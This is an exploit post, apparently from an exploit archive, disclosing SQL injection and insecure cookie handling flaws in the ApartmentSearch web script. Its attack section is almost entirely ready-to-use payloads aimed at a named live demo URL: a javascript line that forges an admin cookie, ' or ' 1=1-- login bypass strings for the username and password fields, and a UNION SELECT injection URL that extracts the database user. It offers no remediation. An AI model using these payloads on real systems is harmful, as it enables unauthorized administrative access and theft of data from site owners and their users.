ApartmentSearch suffers from remote SQL injection and insecure cookie handling vulnerabilities.
f70664f1159346a32dca8e14d11a30139bed900ebb07ff196dbbd374ada33bc1
|=-----------------------------------------------------=|
|=-------------=[ JIKO |No-exploit.Com| ]=-----------=|
|=-----------------------------------------------------=|
[~]-----------|00|
NAme :JIKO (JAWAD)
Home :No-exploit.Com
Mail : !x!
[~]-----------|01|
-{Script}
name :ApartmentSearch
link :http://www.ezonescripts.com/productdemos/ApartmentSearch/Site_Admin/admin.php
[~]-----------|02|
-{3xpl01t}
javascript:document.cookie="SiteAdminPass=1; path=/productdemos/ApartmentSearch/Site_Admin/";
USer:' or ' 1=1--
pass:' or ' 1=1--
http://www.ezonescripts.com/productdemos/ApartmentSearch/listtest.php?r=-1%20union%20select%200,user()--
[~]-----------|03|
-{Greetz}
Cyber-Zone,HxH,Hussin X,sniper code,Stack,HiSoKa,The SadHacker
|No-Exploit.com Members
---------------------------------------------------------